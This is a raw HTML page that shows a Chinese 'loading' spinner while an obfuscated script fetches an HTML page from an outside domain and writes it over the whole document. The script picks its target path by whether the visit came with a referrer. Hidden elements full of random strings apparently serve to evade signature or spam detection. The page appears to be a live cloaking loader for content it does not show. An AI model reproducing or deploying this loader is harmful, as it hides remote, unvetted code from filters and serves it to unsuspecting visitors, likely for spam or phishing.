<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .EmUkH64s {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .EmUkH64s .Vr1nA1cAye {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .EmUkH64s .content {
            line-height: 50px;
            text-align: center
        }

        .EmUkH64s .img {
            width: 100%
        }

        .EmUkH64s .qgucQODU {
            text-align: center
        }

        .EmUkH64s .qgucQODU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .EmUkH64s .qgucQODU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .EmUkH64s .qgucQODU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .EmUkH64s .qgucQODU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .EmUkH64s .qgucQODU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .EmUkH64s .qgucQODU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .EmUkH64s .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function xPR2rntQ4Y(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var QUxlEjQ = xPR2rntQ4Y('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ QUxlEjQ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ QUxlEjQ +".html?a=share";
		}
		
        t8VBheDynK=url+"#"+new Date().getTime();
        t8VBheDynK && function() {
            $.get(t8VBheDynK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >M08XrBvFdX92lIfBB0S36qoXNzwl05zo6DmtgBCTIxliVBcnXOEQWd0gNmDsFaCSuF6yECoEAmIp0NuZzUtTFftxUhjKjyNFrsZ0I</b>
<span style='display:none'>wAAXehuXeC6KuG0crfQMqxnGJQMiihmYTxDPCta15C6SKsnr2Iwa6H6GSiEi8iezCmpdduAvvlUJZ3iMAqQT</span>
<span style='display:none'>wAAXehuXeC6KuG0crfQMqxnGJQMiihmYTxDPCta15C6SKsnr2Iwa6H6GSiEi8iezCmpdduAvvlUJZ3iMAqQT</span>
<h1 style='display:none' >my1bc4qzXFldO5vpHaAWNhTjEJQl1F7C1ixqCCH6t4</h1>
<b style='display:none' >M08XrBvFdX92lIfBB0S36qoXNzwl05zo6DmtgBCTIxliVBcnXOEQWd0gNmDsFaCSuF6yECoEAmIp0NuZzUtTFftxUhjKjyNFrsZ0I</b>
<p  style='display:none'>U0JRbY1Z2A71XEUzDsv4xboI0vFRmX88lKzrhvbM9ZSHiqDiu7l21kGoBv23jwvyv5o71vdck5W44PNilmLZ</p><div class="EmUkH64s">
    <div class="Vr1nA1cAye">
        <div class="qgucQODU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<div style='display:none'>iTFnPITkCMH5SNEEdZcnL2NezwGQrul4Kpq7dkOO1mniAMFquohkDHfDRbradeaLpEM</div>
<b style='display:none' >OpozGTeZgkiz1lQpsfXSMuniscr6mnUn</b>
<a  href='#' style='display:none'>KoTtZZPPX5gOnEtkDXNUHPunHA3zrLOcF00siJ42KA3TzTZbYRHpAAY</a>
<img  src='' style='display:none'>
<ul style='display:none' >vMuYOW4PpDoIPDHLc0nAztXQ2CYMv34JwsY48Ebz0bOD</ul></body>
</html>